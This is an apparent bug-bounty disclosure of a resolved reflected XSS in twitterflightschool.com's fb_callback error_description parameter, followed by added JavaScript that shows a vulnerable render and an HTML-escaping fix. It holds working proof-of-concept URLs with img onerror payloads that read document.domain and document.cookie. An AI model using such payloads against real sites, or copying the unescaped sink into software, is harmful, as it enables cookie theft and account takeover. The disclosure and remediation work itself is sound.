Reflected XSS in twitterflightschool.com
Vulnerability Details
While testing twitterflightschool.com, I came across the below endpoint:
https://twitterflightschool.com/authentication/fb_callback?error=access_denied&error_code=200&error_description=
I noticed that it is possible to inject a JS payload in the "error_description=" parameter and trigger XSS in twitterflightschool.com.
Reproduction Steps:
==============
Here we go
https://twitterflightschool.com/authentication/fb_callback?error=access_denied&error_code=200&error_description=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28document.domain%29%3E
https://twitterflightschool.com/authentication/fb_callback?error=access_denied&error_code=200&error_description=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28document.cookie%29%3E
## Impact
This will allow the attacker to steal users' cookies.
Report Stats
- Report ID: 770349
- State: Closed
- Substate: resolved
- Upvotes: 133
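
The fix for the class of bug reported above is to HTML-encode `error_description` at the point where it is written into the page. The following is an added example, not part of the original report and not the site's code: the render functions and the attribute sink are assumptions (the `">` prefix in the reported payload suggests a double-quoted attribute context), and the input is the report's own first URL.

```javascript
// Added example: hypothetical callback renderers, not the site's actual code.
// Sample input: the first proof-of-concept URL from the report.
const POC_URL =
  'https://twitterflightschool.com/authentication/fb_callback' +
  '?error=access_denied&error_code=200' +
  '&error_description=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28document.domain%29%3E';

// Extract the parameter the way a server framework would: percent-decoding
// and '+' -> space are applied before the handler sees the value.
function errorDescription(url) {
  return new URL(url).searchParams.get('error_description') ?? '';
}

// Assumed vulnerable sink: the decoded value is concatenated into a
// double-quoted attribute without encoding, so '">' closes the element.
function renderVulnerable(desc) {
  return `<input type="hidden" name="error_description" value="${desc}">`;
}

// Minimal HTML encoder covering text and quoted-attribute contexts.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Hardened sink: same markup, value encoded at the point of output.
function renderHardened(desc) {
  return `<input type="hidden" name="error_description" value="${escapeHtml(desc)}">`;
}

// Regression check: count element start tags in the rendered fragment.
// The template emits exactly one; more means the parameter injected markup.
function countStartTags(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}

const desc = errorDescription(POC_URL);
console.log('decoded   :', desc);
console.log('vulnerable:', renderVulnerable(desc), '| tags:', countStartTags(renderVulnerable(desc)));
console.log('hardened  :', renderHardened(desc), '| tags:', countStartTags(renderHardened(desc)));
```

Setting the `HttpOnly` attribute on session cookies keeps them out of `document.cookie`, which limits the impact stated in the report, but it does not remove the injection itself.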